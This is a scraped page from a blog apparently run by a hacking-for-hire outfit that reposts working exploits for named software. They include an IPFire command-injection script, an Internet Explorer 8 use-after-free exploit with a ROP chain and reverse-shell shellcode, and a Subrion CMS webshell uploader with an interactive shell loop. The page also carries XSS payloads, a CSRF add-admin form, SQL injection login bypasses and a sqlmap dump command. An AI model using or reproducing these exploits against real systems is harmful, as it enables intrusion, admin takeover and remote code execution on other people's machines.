Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863149431

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393

#!/usr/bin/python3

import requests as R
import sys
import base64

try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]
except:
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    exit(1)

veri = { 
        "INSPAKS": f"7zip;{komut}",
        "ACTION":"install",
        "x": "10",
        "y": "6" }
token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
header = {"Authorization": token,
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
        "Origin": host,
        "Sec-GPC": "1",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Referer": host}


R.post(url, data=veri, headers=header, verify=False)
print("Done.")
HireHackking 
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
# Date: 14-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Linux parrot

# --- Description --- #

# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel  

# --- Proof of concept --- #

1- Create account and login as member and go to:  http://localhost/APR/edit_info.php
2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
5- refresh the page and Xss popup will be triggered.

6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
7- Our Xss payload will be executed on Admin Browser

** Attacker can use this vulnerability to take over Admin account **
HireHackking 
# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
# Date: 16-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.

Attack Vector :

This vulnerability can result in the attacker to inject the XSS
payload in the Title field of the page and each time any user will
open the website, the XSS triggers and attacker can able to steal the
cookie according to the crafted payload.

Vulnerable Parameters: Settings System Info field
Payload : <script>alert(1)</script>

Vulnerable URL :
http://localhost/chatbot/admin/?page=system_info

Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Settings and Select System Info.
3) Put Payload into the System name  input field.
4) Click on Save.
5) XSS payload will be triggered.
HireHackking 
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86


# --- Proof of concept --- #

# Vulnerable file : http://localhost/APR/admin/user.php

# Exploit:

<html>
<head>
   <title>Add Admin</title>
</head>
<body>
   <h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
   <input type="hidden" name="username" value="lol">
   <input type="hidden" name="password" value="321" >
   <button type="submit" name="submit">Click</button>
</form>
</body>
</html>
HireHackking

Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free

HACKER · %s · %s

# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json # Exploit Author: SlidingWindow # Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN # Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1) # Bypasses: DEP, ASLR using MSVCR71.DLL # Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training <html> <script> var spraychunks = new Array(); // Use BSTR spray since DEPS spray didn't work here function heapspray() { var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain. ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //Some padding ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565"); //ESP will point to 0x0c0c122c after stack-heap flip. ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //More padding for ADD ESP, 100 ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565"); //rop chain generated with mona.py - www.corelan.be //ropchain needed a little fix ropchain += unescape( "" + // #[---INFO:gadgets_to_set_ebp:---] : "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ebx:---] : "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201 "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] "%uffff%uffff" + // 0xffffffff : ,# "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edx:---] : "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ecx:---] : "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edi:---] : "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_esi:---] : "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] // "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "" + // #[---INFO:pushad:---] : "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "" + // #[---INFO:extras:---] : "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); var junk = unescape("%u2020%u2020"); while (junk.length < 0x4000) junk += junk; offset = 0x204/2 ; //0c0c1228 var junk_front = junk.substring(0,offset); var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length) var smallblock = junk_front + ropchain + shellcode + junk_end; var largeblock = ""; while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; } // make allocations for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2); } } function alloc(nr_alloc){ for (var i=0; i < nr_alloc; i++){ divobj = document.createElement('div'); // Allocate 0x25 (37 decimal) bytes. Vulnerable object size = 0x4c bytes divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" + "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858"; } } heapspray(); function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); heapspray(); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { //Vulnerable Object is freed here document.write(""); //Replace/Reclaim the freed object here. //Object size is 0x4c alloc(0x20); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html> <!-- Debug: Taking a different code path for this exploit First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000 eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] ds:002b:40404040=???????? 0:005> u eip mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] 7467b68f 8b5070 mov edx,dword ptr [eax+70h] 7467b692 ffd2 call edx 7467b694 8b400c mov eax,dword ptr [eax+0Ch] 7467b697 c3 ret 7467b698 90 nop 7467b699 90 nop 7467b69a 90 nop 0:005> ub eip mshtml!CElement::SecurityContext+0x22: 7467b681 8b01 mov eax,dword ptr [ecx] 7467b683 8b5070 mov edx,dword ptr [eax+70h] 7467b686 ffe2 jmp edx 7467b688 90 nop 7467b689 90 nop 7467b68a 90 nop 7467b68b 90 nop 7467b68c 90 nop
HireHackking
# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook # Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook # Version: 2.4.4 Advanced Guestbook is a free open source guestbook script developed in PHP. Examples of features include email notifications, uploading pictures, html tags handling, multiple polls, comments and themes. #Description The following is PoC to use the XSS bug with authorized user. Firstly there are four part of a emotion object which is : - Emotion icon - Emotion file name - Emotion command which will be used to call this object (s_code) - Emotion description (s_emotion) Here is the exploitation steps for vulnerability: 1. Login to your admin account. 2. Go to "Smilies" tab to view and edit emotion icons 3. Click "edit" text in the "Action" column to edit emotions 4. Change emotion description to Javascript code 5. Click the "Submit Settings" 6. Click "Smilies" tab again to view all emotions and Javascript code will be executed # Vulnerable Parameter Type: POST # Vulnerable Parameter: s_emotion # Attack Pattern: <script>alert("Smile more!")</script> #PoC HTTP Request: POST /advancedguestbook/admin.php HTTP/1.1 Host: HOST_ADDRESS Content-Length: 175 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_ADDRESS Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842; _gat=1 Connection: close s_code=:cool:&s_emotion=<script>alert("Smile more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1
HireHackking

EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection

HACKER · %s · %s

# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection # Date: 5/17/2021 # Exploit Author: Dimitrios Mitakos # Vendor Homepage: https://egavilanmedia.com # Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ # Version: 1.0 # Tested on: Debian GNU/Linux 10 Vulnerable Parameter : firstname 1. Burp Suite -> Intercept is on 2. Go to the Website -> Add New Record 3. Back to Burp Suite -> Copy to file (r.txt) POST /insert.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 67 Origin: http:// <http://10.0.2.244/>x.x.x.x Connection: close Referer: http://x.x.x.x/index.php Upgrade-Insecure-Requests: 1 firstname=x&lastname=y&address=z&skills=w&designation=a&insertData= 4. sqlmap -r r.txt --dump
HireHackking

Subrion CMS 4.2.1 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) # Date: 17/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://subrion.org/ # Software Link: https://github.com/intelliants/subrion # Version: SubrionCMS 4.2.1 # Tested on: Debian9, Debian 10 and Ubuntu 16.04 # CVE: CVE-2018-19422 # Exploit Requirements: BeautifulSoup library # https://github.com/intelliants/subrion/issues/801 #!/usr/bin/python3 import requests import time import optparse import random import string from bs4 import BeautifulSoup parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel") parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login") options, args = parser.parse_args() if not options.url: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://target-uri/panel') print('[+] Example help usage: exploit.py -h') exit() url_login = options.url url_upload = options.url + 'uploads/read.json' url_shell = options.url + 'uploads/' username = options.user password = options.passw session = requests.Session() def login(): global csrfToken print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n') print('[+] Trying to connect to: ' + url_login) try: get_token_request = session.get(url_login) soup = BeautifulSoup(get_token_request.text, 'html.parser') csrfToken = soup.find('input',attrs = {'name':'__st'})['value'] print('[+] Success!') time.sleep(1) if csrfToken: print(f"[+] Got CSRF token: {csrfToken}") print("[+] Trying to log in...") auth_url = url_login auth_cookies = {"loader": "loaded"} auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"} auth_data = {"__st": csrfToken, "username": username, "password": password} auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data) if len(auth.text) <= 7000: print('\n[x] Login failed... Check credentials') exit() else: print('[+] Login Successful!\n') else: print('[x] Failed to got CSRF token') exit() except requests.exceptions.ConnectionError as err: print('\n[x] Failed to Connect in: '+url_login+' ') print('[x] This host seems to be Down') exit() return csrfToken def name_rnd(): global shell_name print('[+] Generating random name for Webshell...') shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) time.sleep(1) print('[+] Generated webshell name: '+shell_name+'\n') return shell_name def shell_upload(): print('[+] Trying to Upload Webshell..') try: up_url = url_upload up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"} up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"} up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n" session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data) except requests.exceptions.HTTPError as conn: print('[x] Failed to Upload Webshell in: '+url_upload+' ') exit() def code_exec(): try: url_clean = url_shell.replace('/panel', '') req = session.get(url_clean + shell_name + '.phar?cmd=id') if req.status_code == 200: print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n') while True: cmd = input('$ ') x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'') print(x.text) else: print('\n[x] Webshell not found... upload seems to have failed') except: print('\n[x] Failed to execute PHP code...') login() name_rnd() shell_upload() code_exec()
HireHackking

WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) # Author: Luis Martinez # Discovery Date: 2021-05-18 # Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887 # Software Link: App Store for iOS devices # Tested Version: 14.16.10 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 7 iOS 14.5.1 # Steps to Produce the Crash: # 1.- Run python code: WebSSH_for_iOS_14.16.10.py # 2.- Copy content to clipboard # 3.- Open "WebSSH for iOS" # 4.- Click -> Tools # 5.- Click -> mashREPL # 6.- Paste ClipBoard on "mashREPL>" # 7.- Intro # 8.- Crashed #!/usr/bin/env python buffer = "\x41" * 300 print (buffer)
HireHackking
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) # Date: 04/08/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ # Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip # Version: <= 2021.8 # Tested on: Windows-Ubuntu # CVE : CVE-2021-24245 Summary: Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript Proof of concepts: 1-Install "Stop Spammers <= 2021.8" in your wordpress website 2-For testing remove your IP address from the allowed list 3-Go to http://<YOUR-WEBSITE>/wp-admin 4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) " #Notice the `ad` keyword must be in your payload! 5-Press Alt + Shift + X to trigger Xss #Tested on Firefox Request POC: POST /wp-login.php HTTP/1.1 Host: localhost Connection: close Content-Length: 161 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_test_cookie=WP+Cookie+check; log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
HireHackking
# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass) # Date: 19/05/2021 # Exploit Author: Rohit Burke # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 SQL Injection: Injection flaws, such as SQL, NoSQL, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. Attack vector: An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1) Open admin login page using following URl: "http://localhost/covid-tms/login.php" 2) Now put the payload below the Username and password field. Payload: admin' or '1'='1 and you will be successfully logged In as Admin without any credentials.
HireHackking
# Exploit Title: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path # Discovery by: Emmanuel Lujan # Discovery Date: 2021-05-19 # Vendor Homepage: https://www.acer.com/ac/en/US/content/home # Tested Version: 3.0.0.99 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Home Premium x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ NTI IScheduleSvc NTI ISch eduleSvc C:\Program Files (x86)\NTI\Acer Backup Man ager\IScheduleSvc.exe Auto # Service info: C:\>sc qc "NTI IScheduleSvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NTI IScheduleSvc TYPE : 110 WIN32_OWN_PROCESS <interactive> START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Acer Backup Manager\IScheduleSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NTI IScheduleSvc DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS) # Date: 19/05/2021 # Exploit Author: Rohit Burke # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 ==> Stored Cross-Site Scripting XSS: An attacker uses Stored XSS to inject malicious content (referred to as the payload), most often JavaScript code, into the target application. If there is no input validation, this malicious code is permanently stored (persisted) by the target application, for example within a database. For example, an attacker may enter a malicious script into a user input field such as a blog comment field or in a forum post. When a victim opens the affected web page in a browser, the XSS attack payload is served to the victim’s browser as part of the HTML code (just like a legitimate comment would). This means that victims will end up executing the malicious script once the page is viewed in their browser. ==> Attack Vendor: This vulnerability can results attacker injecting the XSS payload in the Admin profile section and each time admin visits the all other sections of the application the XSS triggers and the attacker can able to steal the cookie according to the crafted payload. ==> Vulnerable Parameters: "Admin name" parameter ==> Steps for reproduce: 1) Go to http://localhost/covid-tms/login.php and logged In as an Admin (#Username: admin #Password: Test@123). 2) Click on (Admin --> Profile). Enter the payload in Admin name = <script>alert(1337)</script> Click on submit. 3) Now, whichever section of the application admin visits the payload gets executed successfully.
HireHackking

Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS) # Exploit Author: @nu11secur1ty # Date: 05.20.2021 # Software Link: https://github.com/spotweb/spotweb # Proof: https://streamable.com/hix5o1 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty from selenium import webdriver import time import os, sys # Vendor: https://www.nzbserver.com/ # Jump over login form :D website_link="http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true" # enter your login username username="nu11secur1ty" # enter your login password password="password" #enter the element for username input field element_for_username="loginform[username]" #enter the element for password input field element_for_password="loginform[password]" #enter the element for submit button element_for_submit="loginform[submitlogin]" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users time.sleep(3) browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit Cross Site Scripting (DOM Based) # Payload: #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e time.sleep(1) # Payload link "esc-rule" browser.get(("http://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/**/oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'"")) print("The payload is deployed DOM is BOMing you ':))'...\n") os.system('pause') browser.close() except Exception: #### This exception occurs if the element are not found in the webpage. print("DOM...")
HireHackking
